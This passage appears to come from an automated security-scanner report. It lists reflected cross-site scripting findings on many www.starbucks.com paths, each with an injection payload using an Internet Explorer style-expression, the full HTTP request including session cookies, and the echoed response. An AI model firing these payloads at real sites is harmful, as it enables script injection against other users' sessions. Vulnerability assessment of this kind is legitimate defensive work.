<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse/community?e306b"style="x:expression(alert(1))"0add0d892c7=1"/> ...[SNIP]...
3.32. http://www.starbucks.com/coffeehouse/community/mystarbucksidea [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse/community/mystarbucksidea
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fb2f"style%3d"x%3aexpression(alert(1))"d8b67fa78b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6fb2f"style="x:expression(alert(1))"d8b67fa78b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse/community/mystarbucksidea?6fb2f"style%3d"x%3aexpression(alert(1))"d8b67fa78b9=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:51:50 GMT Connection: close Content-Length: 41586
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse/community/mystarbucksidea?6fb2f"style="x:expression(alert(1))"d8b67fa78b9=1"/> ...[SNIP]...
3.33. http://www.starbucks.com/coffeehouse/entertainment [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse/entertainment
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c416"style%3d"x%3aexpression(alert(1))"6c5f6b29f5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1c416"style="x:expression(alert(1))"6c5f6b29f5d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse/entertainment?1c416"style%3d"x%3aexpression(alert(1))"6c5f6b29f5d=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:38:05 GMT Connection: close Content-Length: 53500
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse/entertainment?1c416"style="x:expression(alert(1))"6c5f6b29f5d=1"/> ...[SNIP]...
3.34. http://www.starbucks.com/coffeehouse/mobile-apps [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse/mobile-apps
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48dbe"style%3d"x%3aexpression(alert(1))"2be3e39534b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 48dbe"style="x:expression(alert(1))"2be3e39534b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse/mobile-apps?48dbe"style%3d"x%3aexpression(alert(1))"2be3e39534b=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:40:51 GMT Connection: close Content-Length: 42056
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps?48dbe"style="x:expression(alert(1))"2be3e39534b=1"/> ...[SNIP]...
3.35. http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse/mobile-apps/mystarbucks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26134"style%3d"x%3aexpression(alert(1))"dc4b3c470d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26134"style="x:expression(alert(1))"dc4b3c470d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse/mobile-apps/mystarbucks?26134"style%3d"x%3aexpression(alert(1))"dc4b3c470d=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:43:06 GMT Connection: close Content-Length: 37880
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks?26134"style="x:expression(alert(1))"dc4b3c470d=1"/> ...[SNIP]...
3.36. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse/mobile-apps/starbucks-card-mobile
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 462d1"style%3d"x%3aexpression(alert(1))"ac69f70948 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 462d1"style="x:expression(alert(1))"ac69f70948 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse/mobile-apps/starbucks-card-mobile?462d1"style%3d"x%3aexpression(alert(1))"ac69f70948=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:48:56 GMT Connection: close Content-Length: 39150
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile?462d1"style="x:expression(alert(1))"ac69f70948=1"/> ...[SNIP]...
3.37. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse/mobile-apps/starbucks-card-mobile-bb
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de919"style%3d"x%3aexpression(alert(1))"904c963c339 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de919"style="x:expression(alert(1))"904c963c339 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse/mobile-apps/starbucks-card-mobile-bb?de919"style%3d"x%3aexpression(alert(1))"904c963c339=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:43:31 GMT Connection: close Content-Length: 39649
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb?de919"style="x:expression(alert(1))"904c963c339=1"/> ...[SNIP]...
3.38. http://www.starbucks.com/coffeehouse/store-design [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse/store-design
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b663f"style%3d"x%3aexpression(alert(1))"fd0669f60f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b663f"style="x:expression(alert(1))"fd0669f60f4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse/store-design?b663f"style%3d"x%3aexpression(alert(1))"fd0669f60f4=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:48:45 GMT Connection: close Content-Length: 44147
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse/store-design?b663f"style="x:expression(alert(1))"fd0669f60f4=1"/> ...[SNIP]...
3.39. http://www.starbucks.com/coffeehouse/wireless-internet [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse/wireless-internet
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8449"style%3d"x%3aexpression(alert(1))"73d4ee3cd6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8449"style="x:expression(alert(1))"73d4ee3cd6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse/wireless-internet?a8449"style%3d"x%3aexpression(alert(1))"73d4ee3cd6d=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:38:32 GMT Connection: close Content-Length: 37927
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse/wireless-internet?a8449"style="x:expression(alert(1))"73d4ee3cd6d=1"/> ...[SNIP]...
3.40. http://www.starbucks.com/coffeehouse/wireless-internet/in-canada [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse/wireless-internet/in-canada
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc3da"style%3d"x%3aexpression(alert(1))"1f3227134dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc3da"style="x:expression(alert(1))"1f3227134dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse/wireless-internet/in-canada?fc3da"style%3d"x%3aexpression(alert(1))"1f3227134dc=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:38:09 GMT Connection: close Content-Length: 38207
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse/wireless-internet/in-canada?fc3da"style="x:expression(alert(1))"1f3227134dc=1"/> ...[SNIP]...
3.41. http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f393"style%3d"x%3aexpression(alert(1))"bf3de1874fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f393"style="x:expression(alert(1))"bf3de1874fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse/wireless-internet/starbucks-digital-network?6f393"style%3d"x%3aexpression(alert(1))"bf3de1874fc=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:41:08 GMT Connection: close Content-Length: 38665
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network?6f393"style="x:expression(alert(1))"bf3de1874fc=1"/> ...[SNIP]...
3.42. http://www.starbucks.com/customer-service/contact [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/customer-service/contact
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5d09"style%3d"x%3aexpression(alert(1))"17035a06782 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5d09"style="x:expression(alert(1))"17035a06782 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /customer-service/contact?e5d09"style%3d"x%3aexpression(alert(1))"17035a06782=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:37:47 GMT Connection: close Content-Length: 37097
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/customer-service/contact?e5d09"style="x:expression(alert(1))"17035a06782=1"/> ...[SNIP]...
3.43. http://www.starbucks.com/customer-service/faqs/card [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/customer-service/faqs/card
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51bc5"style%3d"x%3aexpression(alert(1))"c6d67963f2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 51bc5"style="x:expression(alert(1))"c6d67963f2f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /customer-service/faqs/card?51bc5"style%3d"x%3aexpression(alert(1))"c6d67963f2f=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:36:59 GMT Connection: close Content-Length: 87713
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/card?51bc5"style="x:expression(alert(1))"c6d67963f2f=1"/> ...[SNIP]...
3.44. http://www.starbucks.com/customer-service/faqs/coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/customer-service/faqs/coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8de96"style%3d"x%3aexpression(alert(1))"6b0cfc1dd14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8de96"style="x:expression(alert(1))"6b0cfc1dd14 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /customer-service/faqs/coffee?8de96"style%3d"x%3aexpression(alert(1))"6b0cfc1dd14=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:21:45 GMT Connection: close Content-Length: 37419
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/coffee?8de96"style="x:expression(alert(1))"6b0cfc1dd14=1"/> ...[SNIP]...
3.45. http://www.starbucks.com/customer-service/faqs/coffeehouse [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/customer-service/faqs/coffeehouse
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19c91"style%3d"x%3aexpression(alert(1))"e534a4ef04b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19c91"style="x:expression(alert(1))"e534a4ef04b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /customer-service/faqs/coffeehouse?19c91"style%3d"x%3aexpression(alert(1))"e534a4ef04b=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:35:19 GMT Connection: close Content-Length: 58084
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/coffeehouse?19c91"style="x:expression(alert(1))"e534a4ef04b=1"/> ...[SNIP]...
3.46. http://www.starbucks.com/customer-service/faqs/menu [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/customer-service/faqs/menu
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f91e"style%3d"x%3aexpression(alert(1))"2090cf84852 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3f91e"style="x:expression(alert(1))"2090cf84852 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
